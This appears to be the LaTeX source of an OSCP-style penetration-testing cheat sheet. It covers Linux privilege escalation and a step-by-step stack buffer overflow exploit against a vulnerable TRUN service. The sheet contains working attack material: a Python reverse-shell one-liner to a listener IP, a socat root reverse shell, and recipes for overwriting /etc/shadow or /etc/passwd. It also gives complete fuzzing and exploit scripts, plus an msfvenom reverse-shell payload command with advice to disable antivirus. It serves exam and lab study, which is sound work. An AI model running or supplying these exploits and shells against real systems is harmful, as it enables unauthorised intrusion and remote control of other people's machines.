Esc Checklist & \{\{fa-bolt\}\} uname -a \{\{fa-bolt\}\} id \{\{fa-bolt\}\} sudo -l \{\{fa-bolt\}\} /etc/crontab (also /etc/cron.d/ and /var/spool/cron/) \{\{fa-bolt\}\} SUID binaries: find / -perm -4000 -type f 2\textgreater{}/dev/null \{\{fa-bolt\}\} linpeas \{\{fa-bolt\}\} \seqsplit{linux-exploit-suggester} \{\{fa-bolt\}\} pspy \{\{fa-bolt\}\} netstat \{\{fa-bolt\}\} capabilities \{\{fa-bolt\}\} search directories for sensitive files (configs, keys, history files, backups) \{\{fa-bolt\}\} use ps aux | grep root to look at any services that are running as root. \{\{nl\}\} \{\{fa-bolt\}\} Password Spray \{\{fa-bolt\}\} Config files of running services might leak creds \tn % Row Count 23 (+ 22) % Row 2 \SetRowColor{LightBackground} C program & make \textless{}name\textgreater{} compiles \textless{}name\textgreater{}.c, then ./\textless{}name\textgreater{} to execute \tn % Row Count 25 (+ 2) % Row 3 \SetRowColor{white} SCP (secure copy files) from local to remote machine & scp \textless{}filename\textgreater{} username@ip:\textless{}location\textgreater{} \tn % Row Count 28 (+ 3) % Row 4 \SetRowColor{LightBackground} Python server & \{\{fa-bolt\}\} python3 -m http.server (serves the current directory on port 8000 to anyone who can reach it -{}- stop it when done) \tn % Row Count 30 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Privilege escalation (cont)}} \tn % Row 5 \SetRowColor{LightBackground} Unix info about your specific Linux distribution & \{\{fa-bolt\}\} lsb\_release -a \{\{fa-bolt\}\} uname -a \tn % Row Count 3 (+ 3) % Row 6 \SetRowColor{white} Use echo " text " into file & \{\{fa-bolt\}\} echo "text" \textgreater{} output.txt \tn % Row Count 5 (+ 2) % Row 7 \SetRowColor{LightBackground} Python reverse shell (replace 10.10.14.157:1235 with your listener) & \{\{fa-bolt\}\} python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect(("10.10.14.157",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call({[}"/bin/sh","-i"{]});' \tn % Row Count 17 (+ 12) % Row 8 \SetRowColor{white} View Cronjobs & \{\{fa-bolt\}\} cat /etc/crontab; ls -la /etc/cron.d/ \tn % Row Count 19 (+ 2) % Row 9 
\SetRowColor{LightBackground} Exploiting sudo -l user NOPASSWD: ALL & \{\{fa-bolt\}\} sudo -i -u \textless{}user\textgreater{} \{\{nl\}\}\{\{fa-bolt\}\} With (ALL) NOPASSWD: ALL a plain sudo -i gives a root login shell; -u \textless{}user\textgreater{} switches to another user the rule allows \tn % Row Count 21 (+ 2) % Row 10 \SetRowColor{white} Sudo knowledge & \{\{fa-bolt\}\} su asks for the password of the user "root". \{\{nl\}\}\{\{fa-bolt\}\} sudo asks for your own password (and also checks if you're allowed to run commands as root, which is configured through /etc/sudoers and /etc/sudoers.d/ -{}- on Debian/Ubuntu by default all user accounts that belong to the "admin" or "sudo" groups are allowed to use sudo). \{\{nl\}\}\{\{fa-bolt\}\} sudo -s launches a shell as root, but doesn't change your working directory. sudo -i simulates a login into the root account: your working directory will be /root, and root's .profile etc. will be sourced as if on login. \tn % Row Count 49 (+ 28) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Privilege escalation (cont)}} \tn % Row 11 \SetRowColor{LightBackground} Sudo -l (exploiting sudo rights) & \{\{fa-bolt\}\} sudo = "superuser do": run a task with root privileges \{\{nl\}\}\{\{fa-bolt\}\} \seqsplit{https://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights/} \tn % Row Count 8 (+ 8) % Row 12 \SetRowColor{white} After SSH & \{\{fa-linux\}\} \tn % Row Count 9 (+ 1) % Row 13 \SetRowColor{LightBackground} id & \{\{fa-bolt\}\} The id command in Linux prints the user and group names and numeric IDs (UID and GIDs) of the current user or of any other user on the server \tn % Row Count 17 (+ 8) % Row 14 \SetRowColor{white} id shows 108(lxd) & \{\{fa-bolt\}\} \{\{link="https://www.hackingarticles.in/lxd-privilege-escalation/"\}\} LXD privilege escalation\{\{/link\}\} -{}- membership of the lxd group lets you start a privileged container with the host filesystem mounted inside it \tn % Row Count 23 (+ 6) % Row 15 \SetRowColor{LightBackground} Weak File Permission & ls -l \textless{}file\textgreater{} : check owner and permissions; world-writable files owned by root (configs, scripts run by cron) are the interesting ones \tn % Row Count 25 (+ 2) % Row 16 \SetRowColor{white} Readable /etc/shadow & 
\{\{fa-bolt\}\} Copy the hash lines and crack them offline (john or hashcat); a hash starting with \$6\$ is SHA-512 crypt \tn % Row Count 27 (+ 2) % Row 17 \SetRowColor{LightBackground} Writeable /etc/shadow & \{\{fa-bolt\}\} Generate a new hash with mkpasswd -m sha-512 newpasswordhere and paste it into the second field of root's line; keep a copy of the original line so you can restore it \tn % Row Count 31 (+ 4) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Privilege escalation (cont)}} \tn % Row 18 \SetRowColor{LightBackground} Writeable /etc/passwd & \{\{fa-bolt\}\} openssl passwd newpasswordhere generates a crypt hash; put it in root's second field in place of the x (a hash in /etc/passwd takes precedence over /etc/shadow), or append a new user line with UID 0 \tn % Row Count 4 (+ 4) % Row 19 \SetRowColor{white} \seqsplit{.sudo\_as\_admin\_successful} & \{\{fa-bolt\}\} Created in the home directory by Ubuntu's sudo the first time the user runs it successfully -{}- so this user has sudo rights of some kind \{\{nl\}\}\{\{fa-bolt\}\} Check SUID and sudo -l \{\{fa-bolt\}\} Refer to checklist \tn % Row Count 11 (+ 7) % Row 20 \SetRowColor{LightBackground} Socat (more powerful version of nc) & \{\{fa-bolt\}\} We can use socat to send ourselves a root shell (only when sudo -l already allows running socat). \{\{nl\}\}\{\{fa-bolt\}\} Attacking machine: socat file:`tty`,raw,echo=0 tcp-listen:1234\{\{nl\}\}\{\{fa-bolt\}\} Remote machine: sudo socat tcp-connect:\textless{}your-ip-address\textgreater{}:1234 exec:bash,pty,stderr,setsid,sigint,sane \{\{nl\}\} \{\{fa-bolt\}\} \{\{link="https://www.maritimecybersecurity.center/linux-for-pentester-socat-privilege-escalation/"\}\} Socat Reverse shell as root \{\{/link\}\} \{\{nl\}\}\{\{fa-bolt\}\} \seqsplit{https://www.maritimecybersecurity.center/linux-for-pentester-socat-privilege-escalation/} \tn % Row Count 38 (+ 27) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Privilege escalation (cont)}} \tn % Row 21 \SetRowColor{LightBackground} Reverse shell (one-liners) & \{\{fa-bolt\}\} \{\{link="https://j-s-tymchuk.gitbook.io/penetration-testing-playbook/networking-and-shells/reverse-shells"\}\}Reverse shell - 1)Bash-running 
linux, 2)Python, 3)Nc, 4)PHP\{\{/link\}\} \{\{nl\}\}\{\{fa-bolt\}\} \{\{link="https://github.com/t0thkr1s/revshellgen"\}\}Reverse shell Script\{\{/link\}\} \tn % Row Count 15 (+ 15) % Row 22 \SetRowColor{white} Linux Privilege Escalation Checklist & \{\{fa-bolt\}\} \{\{link="https://j-s-tymchuk.gitbook.io/penetration-testing-playbook/privilege-escalation/linux-privilege-escalation"\}\}Guide to follow if stuck\{\{/link\}\} \tn % Row Count 24 (+ 9) % Row 23 \SetRowColor{LightBackground} Linux Priv Esc & \{\{fa-bolt\}\} Kernel exploits : uname -a (match the kernel version against known exploits; they can crash the box, so try them last) \{\{fa-bolt\}\} Execute command as root : sudo -l \{\{fa-bolt\}\} Find binaries we can execute as root : SUID \{\{fa-bolt\}\} check cron jobs, monitor the system live : pspy64 \tn % Row Count 34 (+ 10) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Privilege escalation (cont)}} \tn % Row 24 \SetRowColor{LightBackground} Few things to remember & \{\{fa-bolt\}\} If root runs a file (typically a cron job) that we can write to, we can add a reverse shell to it. If the file itself is not writable but its parent directory is, we can delete the file and drop our own in its place -{}- deleting needs write permission on the directory, not on the file. \tn % Row Count 13 (+ 13) % Row 25 \SetRowColor{white} Linux Priv Esc via Capability (getcap) & \{\{fa-bolt\}\} To list files with capabilities type getcap -r / 2\textgreater{}/dev/null; a cap\_setuid on an interpreter such as python or perl is the classic case \tn % Row Count 17 (+ 4) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{New Page}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{8.4cm}}{} \tn % Row Count 0 (+ 0) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Buffer Overflows 
(OSCP procedure)}} \tn % Row 0 \SetRowColor{LightBackground} Steps & Commands \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} References πŸ’€ & \{\{fa-bolt\}\} \{\{link="https://tcm-sec.com/buffer-overflows-made-easy/"\}\}Cybermentor BoF Notes\{\{/link\}\} \{\{nl\}\}\{\{fa-bolt\}\} \{\{link="https://github.com/gh0x0st/Buffer\_Overflow"\}\}Buffer Overflow Guide\{\{/link\}\} \tn % Row Count 12 (+ 11) % Row 2 \SetRowColor{LightBackground} 1. SPIKING | Testing commands to find vulnerable & πŸ’€ We are trying to test multiple commands and try to find what's vulnerable. \{\{nl\}\}\{\{fa-bolt\}\}For ex for TRUN function \{\{nl\}\} \{\{fa-bolt\}\}─(rootπŸ’€Kali)-{[}\textasciitilde{}/Koth{]} \{\{nl\}\} \{\{fa-bolt\}\}└─\# cat spike.spk \{\{nl\}\} \{\{fa-bolt\}\}s\_readline(); \{\{nl\}\} \{\{fa-bolt\}\}s\_string("TRUN "); \{\{nl\}\} \{\{fa-bolt\}\}s\_string\_variable("0"); \{\{nl\}\} \tn % Row Count 31 (+ 19) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Buffer Overflows (OSCP procedure) (cont)}} \tn % Row 3 \SetRowColor{LightBackground} & \{\{fa-bolt\}\}Attacking Machine \{\{nl\}\}\{\{fa-bolt\}\}nc -nv 10.0.2.14 9999 \{\{nl\}\}\{\{fa-bolt\}\}generic\_send\_tcp 10.0.2.14 9999 spike.spk 0 0 \{\{nl\}\}\{\{fa-bolt\}\} Lookout for Buffer Overflow in Registers \tn % Row Count 10 (+ 10) % Row 4 \SetRowColor{white} 2. 
FUZZING | Crash The Application & 💀 We will now go ahead and attack that command specifically by fuzzing \{\{fa-bolt\}\} When the application crashes and the registers are filled with our bytes, we know TRUN is affected \{\{nl\}\}\{\{fa-bolt\}\} Stop the script with ctrl+c; it prints an estimate of the number of bytes at which TRUN crashed \{\{nl\}\}\{\{fa-bolt\}\} Like its 2800 bytes -\textgreater{} we can round off and make it 3000 \{\{nl\}\}\{\{fa-bolt\}\} Restart the target in the debugger after every crash. The scripts below are Python 2 syntax; on Python 3 the strings sent over the socket must be bytes (.encode()) \tn % Row Count 28 (+ 18) % Row 5 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{` \#!/usr/bin/python\{\{nl\}\} import sys, socket\{\{nl\}\} from time import sleep\{\{nl\}\} buffer = 'A' * 100\{\{nl\}\} while True:\{\{nl\}\} try:\{\{nl\}\} \seqsplit{ s=socket.socket(socket.AF\_INET},socket.SOCK\_STREAM)\{\{nl\}\} s.connect(('10.0.2.14',9999))\{\{nl\}\} s.send(('TRUN /.:/' + buffer))\{\{nl\}\} s.close()\{\{nl\}\} sleep(1)\{\{nl\}\} buffer = buffer + 'A' * 100\{\{nl\}\} except:\{\{nl\}\} print("Fuzzing crashed at \%s bytes" \% str(len(buffer)))\{\{nl\}\} sys.exit()\{\{nl\}\} `} \tn % Row Count 37 (+ 9) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Buffer Overflows (OSCP procedure) (cont)}} \tn % Row 6 \SetRowColor{LightBackground} & \{\{fa-bolt\}\} Goal : know approximately at how many bytes we crashed \{\{nl\}\} \{\{fa-bolt\}\} Once the connection fails the except branch prints "Fuzzing crashed at X bytes" \{\{nl\}\} \{\{fa-bolt\}\} Now we will find where EIP is; for that we are going to use a tool \{\{nl\}\} \tn % Row Count 13 (+ 13) % Row 7 \SetRowColor{white} 3. FINDING THE OFFSET | Find EIP & 💀 First we will use the pattern\_create msf tool to create 3000 bytes, then run exploit.py. 
After that we will use pattern\_offset by specifying the value of EIP which will be within those 3000 bytes To grab the offset \tn % Row Count 24 (+ 11) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{fa-bolt\}\} Tool : Pattern Create \seqsplit{`/usr/share/metasploit-framework/tools/exploit/pattern\_create}.rb -l 3000` \{\{nl\}\} \{\{nl\}\} `\#!/usr/bin/python import sys, socket \{\{nl\}\} offset = (' ') \{\{nl\}\} try: \{\{nl\}\} \seqsplit{s=socket.socket(socket.AF\_INET},socket.SOCK\_STREAM) \{\{nl\}\} s.connect(('10.0.2.14',9999)) \{\{nl\}\} s.send(('TRUN /.:/' + offset)) \{\{nl\}\} s.close() \{\{nl\}\} except: \{\{nl\}\} print("Error Connecting to the Server") \{\{nl\}\} sys.exit()` \{\{nl\}\}\{\{nl\}\} \{\{fa-bolt\}\} Tool : Pattern Offset `pattern\_offset.rb -l 3000 -q \textless{}VALUE/FINDING\textgreater{} from EIP`} \tn % Row Count 36 (+ 12) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Buffer Overflows (OSCP procedure) (cont)}} \tn % Row 9 \SetRowColor{LightBackground} & \{\{fa-bolt\}\} Goal: This offset information is critical because now we know that at this byte we can control the EIP, We will overwrite it with specific bytes \{\{nl\}\} \{\{fa-bolt\}\} This offset information is critical because now we know that at this byte we can control the EIP, \{\{nl\}\}\{\{fa-bolt\}\} Now we will overwrite it with specific bytes \tn % Row Count 17 (+ 17) % Row 10 \SetRowColor{white} 4. 
OVERWRITING THE EIP | Control ESP & 💀 We discovered that the offset is at 2003 bytes, \{\{nl\}\} \{\{fa-bolt\}\}It means there are exactly 2003 bytes before EIP begins \tn % Row Count 24 (+ 7) % Row 11 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{` \#!/usr/bin/python \{\{nl\}\} import sys, socket \{\{nl\}\} shellcode = 'A' * 2003 + 'B' * 4\{\{nl\}\} try:\{\{nl\}\} \seqsplit{s=socket.socket(socket.AF\_INET},socket.SOCK\_STREAM)\{\{nl\}\} s.connect(('10.0.2.14',9999))\{\{nl\}\} s.send(('TRUN /.:/' + shellcode))\{\{nl\}\} s.close()\{\{nl\}\} except:\{\{nl\}\} print("Error Connecting to the Server")\{\{nl\}\} sys.exit()\{\{nl\}\} `} \tn % Row Count 32 (+ 8) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Buffer Overflows (OSCP procedure) (cont)}} \tn % Row 12 \SetRowColor{LightBackground} & \{\{fa-bolt\}\} Goal : Control this EIP now \{\{nl\}\}\{\{fa-bolt\}\} TRUN got filled with a bunch of As \{\{nl\}\}\{\{fa-bolt\}\} EBP, bottom is filled with 41414141 \{\{nl\}\}\{\{fa-bolt\}\} EIP, return is filled with 42424242 \{\{nl\}\}\{\{fa-bolt\}\} We sent only 4 bytes of Bs and all of them landed in EIP -{}- that confirms the offset. If EIP shows a mix of 41 and 42, the offset is off by a few bytes; recheck pattern\_offset \{\{nl\}\} \tn % Row Count 15 (+ 15) % Row 13 \SetRowColor{white} 5. FINDING THE BAD CHARACTERS in HexDump, Note them \& x00 is a bad char & \{\{fa-bolt\}\}\{\{link="https://www.ins1gn1a.com/identifying-bad-characters"\}\} Manually Identify Bad Chars \{\{/link\}\} \{\{nl\}\} After running the script, EIP will still be 42424242, but we will work in the hex dump to find the bad characters. 
\{\{nl\}\} \{\{fa-bolt\}\} Sequence Flow : 01-09 -\textgreater{} 0a-0f -\textgreater{} 10-19 -\textgreater{} 1a-1f -\textgreater{} 20-29 -\textgreater{} 2a-2f ... up to ff \{\{nl\}\} \{\{fa-bolt\}\} Append a marker string such as "blacklist" after the bad chars to identify the end of the buffer \{\{nl\}\} \{\{fa-bolt\}\} Remove each bad char you find from the list and re-run until the dump is clean -{}- one bad char can mask the bytes that follow it \tn % Row Count 34 (+ 19) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Buffer Overflows (OSCP procedure) (cont)}} \tn % Row 14 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{` \#!/usr/bin/python \{\{nl\}\} import sys, socket \{\{nl\}\} badchar = ("\textbackslash{}x01\textbackslash{}x02\textbackslash{}x03 ... \textbackslash{}xff") \# the full \textbackslash{}x01-\textbackslash{}xff sequence from the table below, written out in full; \textbackslash{}x00 is left out\{\{nl\}\} shellcode = 'A' * 2003 + 'B' * 4 + badchar \{\{nl\}\} try:\{\{nl\}\} \seqsplit{ s=socket.socket(socket.AF\_INET},socket.SOCK\_STREAM) \{\{nl\}\} s.connect(('10.0.2.14',9999))\{\{nl\}\} s.send(('TRUN /.:/' + shellcode))\{\{nl\}\} s.close()\{\{nl\}\} except:\{\{nl\}\} print("Error Connecting to the Server")\{\{nl\}\} sys.exit()\{\{nl\}\} `} \tn % Row Count 9 (+ 9) % Row 15 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{x \{\{nl\}\} 01 - 09~ ~ 20 - 29~ ~ 40 - 49~ ~ 60 - 69~ ~ 80 - 89 \{\{nl\}\} 0a - 0f~ ~ ~ 2a - 2f~ ~ 4a - 4f~ ~ ~ 6a - 6f~ ~ 8a - 8f \{\{nl\}\} 10 - 19~ ~ 30 - 39~ ~ 50 - 59~ ~ 70 - 79~ ~ 90 - 99 \{\{nl\}\} 1a - 1f~ ~ ~ 3a - 3f~ ~ 5a - 5f~ ~ ~ 7a - 7f~ ~ 9a - 9f \{\{nl\}\} x \{\{nl\}\} a0 - a9~ ~ c0 - c9~ ~ e0 - e9 \{\{nl\}\} aa - af~ ~ ~ ca - cf~ ~ ea - ef \{\{nl\}\} b0 - b9~ ~ d0 - d9~ ~ f0 - f9 \{\{nl\}\} ba - bf~ ~ ~ da - df~ ~ fa - ff \{\{nl\}\} x} \tn % Row Count 24 (+ 15) % Row 16 \SetRowColor{LightBackground} & \{\{fa-bolt\}\} Go to the hex dump: right click ESP (top) in the register pane \textgreater{} Follow in Dump \textgreater{} Ok \{\{nl\}\} \{\{fa-bolt\}\} We will go through this whole list \{\{nl\}\} \{\{fa-bolt\}\} We check whether anything is out of place \{\{nl\}\} \{\{fa-bolt\}\} We got 01 02 03 ..B0.. ..B0.. B6 B7 B8. 
We have B4 and B5 Missing -\textgreater{} Those are Bad Characters \{\{nl\}\}\{\{fa-bolt\}\} This is EYE TEST, We Need to make sure we find everything, which is out of place \tn % Row Count 45 (+ 21) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Buffer Overflows (OSCP procedure) (cont)}} \tn % Row 17 \SetRowColor{LightBackground} 6. FINDING THE RIGHT MODULE | Find JMP ESP & πŸ’€ Goal : To find a JMP ESP that we will use to tell the application to execute our code. \{\{nl\}\} \{\{fa-bolt\}\} mona modules \textgreater{} Select all with False, means no memory protection in this module \tn % Row Count 10 (+ 10) % Row 18 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`!mona modules` \{\{nl\}\} `nasm\_shell -\textgreater{} JMP ESP` \{\{nl\}\}`!mona find -s "\textbackslash{}xff\textbackslash{}xe4" -m essfunc.dll` \{\{nl\}\} \{\{fa-bolt\}\} rclick on panel \textgreater{} search for the return address we found \{\{nl\}\}\{\{fa-bolt\}\} It will have JMP ESP \& FFE4 location \{\{nl\}\}\{\{fa-bolt\}\} F2 \textgreater{} Put a break point \{\{nl\}\}} \tn % Row Count 16 (+ 6) % Row 19 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{` \#!/usr/bin/python \{\{nl\}\} import sys, socket \{\{nl\}\} \#625011AF\{\{nl\}\} shellcode = 'A' * 2003 + '\textbackslash{}xaf\textbackslash{}x11\textbackslash{}x50\textbackslash{}x62'\{\{nl\}\} try:\{\{nl\}\} \seqsplit{s=socket.socket(socket.AF\_INET},socket.SOCK\_STREAM)\{\{nl\}\} s.connect(('10.0.2.14',9999))\{\{nl\}\} s.send(('TRUN /.:/' + shellcode))\{\{nl\}\} s.close()\{\{nl\}\} except:\{\{nl\}\} print("Error Connecting to the Server")\{\{nl\}\} sys.exit()\{\{nl\}\} `} \tn % Row Count 25 (+ 9) % Row 20 \SetRowColor{white} & πŸ’€ Finally, we were able to provide EIP an valid return address JMP ESP where it can point to in the memory \{\{nl\}\} \{\{fa-bolt\}\} Ran our script with that Pointer address, 
affecting directly the EIP area \{\{nl\}\} \{\{fa-bolt\}\} Changed EIP return address - DONE! \tn % Row Count 38 (+ 13) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Buffer Overflows (OSCP procedure) (cont)}} \tn % Row 21 \SetRowColor{LightBackground} 7. GENERATING SHELLCODE & 💀 Our EIP will point to the JMP ESP, which will run our shellcode and give us a shell with whatever privileges the vulnerable process runs as (not necessarily SYSTEM; "root" does not apply on Windows). \{\{nl\}\}`msfvenom -p \seqsplit{windows/shell\_reverse\_tcp} LHOST=10.0.2.5 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\textbackslash{}x00"` \{\{nl\}\}\{\{fa-bolt\}\} -b must list every bad char found in step 5, not only \textbackslash{}x00 (e.g. -b "\textbackslash{}x00\textbackslash{}xb4\textbackslash{}xb5" for the example above), otherwise the encoded payload will be corrupted in memory. -a x86 must match the target architecture; EXITFUNC=thread ends only the thread, not the whole process, when the shell exits \tn % Row Count 11 (+ 11) % Row 22 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{` \#!/usr/bin/python \{\{nl\}\} import sys, socket \{\{nl\}\} overflow = ("Inside this malicious shellcode") \# replace with the msfvenom -f c output \{\{nl\}\} shellcode = 'A' * 2003 + '\textbackslash{}xaf\textbackslash{}x11\textbackslash{}x50\textbackslash{}x62' + '\textbackslash{}x90' * 32 + overflow \{\{nl\}\} try: \{\{nl\}\} \seqsplit{ s=socket.socket(socket.AF\_INET},socket.SOCK\_STREAM) \{\{nl\}\} s.connect(('10.0.2.14',9999)) \{\{nl\}\} s.send(('TRUN /.:/' + shellcode)) \{\{nl\}\} s.close() \{\{nl\}\} except: \{\{nl\}\} print("Error Connecting to the Server") \{\{nl\}\} sys.exit() \{\{nl\}\} `} \tn % Row Count 20 (+ 9) % Row 23 \SetRowColor{LightBackground} & 💀 Shellcode needs 4 things \{\{nl\}\} \{\{fa-bolt\}\} 1. The exact number of bytes to crash (Crash Point / offset, 2003 here) \{\{nl\}\}\{\{fa-bolt\}\} 2. The value of the JMP ESP that will instruct the application to execute our code (Return Address, little-endian) \{\{nl\}\}\{\{fa-bolt\}\} 3. Padding: a NOP sled (\textbackslash{}x90 bytes) between the return address and the shellcode so the encoder's decoder stub has room to unpack \{\{nl\}\}\{\{fa-bolt\}\} 4.
shellcode to grab the reverse shell (start the listener on LHOST:LPORT before sending) \tn % Row Count 36 (+ 16) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Buffer Overflows (OSCP procedure) (cont)}} \tn % Row 24 \SetRowColor{LightBackground} 8. ROOT | Exploit & \{\{fa-bolt\}\} Disable real-time protection / antivirus on the lab target while practising: a stock msfvenom payload is widely signatured and will otherwise be blocked before the shell connects \{\{nl\}\} \{\{fa-bolt\}\} \textbackslash{}x41, \textbackslash{}x42, \textbackslash{}x43 - The hexadecimal values for A, B and C, which is how the 'A' and 'B' padding above shows up in the registers. \tn % Row Count 9 (+ 9) % Row 25 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\{\{fa-bolt\}\}{\emph{Anatomy of Stack : EBEE}} \{\{nl\}\}\{\{fa-bolt\}\}ESP (Extended Stack Pointer) : It's at the TOP (lowest address) \{\{nl\}\}\{\{fa-bolt\}\}Buffer Space : Fills toward EBP \& EIP as data is written (toward higher addresses); a correctly sized write stops before them, an overflow overwrites them \{\{nl\}\}\{\{fa-bolt\}\}EBP (Extended Base Pointer) : It's at the BOTTOM \{\{nl\}\}\{\{fa-bolt\}\}EIP (Extended Instruction Pointer) : It's the saved Return Address, right after EBP} \tn % Row Count 16 (+ 7) % Row 26 \SetRowColor{LightBackground} \{\{fa-bolt\}\} ESP & \{\{fa-bolt\}\} The Extended Stack Pointer (ESP) is a register that lets you know where on the stack you are and allows you to push data in and out of the application. After the overflow it points just past the overwritten return address, which is why JMP ESP lands in our buffer. \tn % Row Count 25 (+ 9) % Row 27 \SetRowColor{white} \{\{fa-bolt\}\} EIP & \{\{fa-bolt\}\} It's the saved Return Address: once we control it we choose where execution continues, e.g. into our shellcode to gain a reverse shell \{\{nl\}\}\{\{fa-bolt\}\} The Extended Instruction Pointer (EIP) is a register that contains the address of the next instruction for the program or command.
\tn % Row Count 40 (+ 15) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Buffer Overflows (OSCP procedure) (cont)}} \tn % Row 28 \SetRowColor{LightBackground} \{\{fa-bolt\}\} JMP & \{\{fa-bolt\}\} The Jump (JMP) is an instruction that modifies the flow of execution: the operand you designate holds the address being jumped to. JMP ESP transfers control to whatever is at the top of the stack, i.e. our data. \tn % Row Count 8 (+ 8) \hhline{>{\arrayrulecolor{DarkBackground}}--} \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{1 Spiking : Method to find the vulnerable part (command) of the program \newline 2 Fuzzing : We send increasing amounts of characters to the program to check whether it crashes \newline 3 Finding the Offset : If it crashes, we find the exact number of bytes at which it breaks \newline 4 Overwriting the EIP : We use that offset to overwrite the EIP, so the pointer address is under our control \newline + EIP controlled \newline 5 Finding Bad Characters \newline 6 Finding the Right Module \newline 7 Generating Shellcode \newline + Root} \tn \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} % That's all folks \end{multicols*} \end{document}